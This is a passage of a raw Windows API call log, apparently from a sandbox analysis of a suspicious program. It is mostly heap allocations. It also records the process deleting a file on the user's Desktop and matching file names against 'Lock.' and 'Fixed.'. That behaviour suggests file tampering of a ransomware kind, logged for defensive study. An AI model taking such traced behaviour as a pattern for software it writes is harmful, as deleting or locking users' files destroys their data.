hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0158.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0158.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.771] CloseHandle (hObject=0x2d0) returned 1 [0158.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0158.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0158.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0158.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0158.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0158.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0158.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0158.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0158.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0158.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0158.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0158.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0158.876] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0158.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0158.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0158.876] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0158.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e563a8 [0158.877] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Hexadecimal_Calculator.ns", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns", lpFilePart=0x8cedf4*="Hexadecimal_Calculator.ns") returned 0x31 [0158.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0158.878] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns")) returned 0x20 [0158.878] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd48798c8, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd48798c8, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48798c8, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x33fc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Hexadecimal_Calculator.ns", cAlternateFileName="HEXADE~1.NS")) returned 0xa87610 [0158.878] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns")) returned 1 [0158.883] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd48798c8, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd48798c8, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48798c8, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x33fc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Hexadecimal_Calculator.ns", cAlternateFileName="HEXADE~1.NS")) returned 0 [0158.883] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0158.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0158.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0158.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0158.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0158.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0158.883] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0158.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0158.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0158.883] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0158.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0158.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0158.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e563a8 [0158.884] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Hexadecimal_Calculator.ns", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns", lpFilePart=0x8cf650*="Hexadecimal_Calculator.ns") returned 0x31 [0158.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0158.884] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns")) returned 0xffffffff [0158.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0158.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexDCIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exDCIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDCIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DCIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0158.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexDCIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exDCIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDCIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DCIF.hex", cchCount1=6, 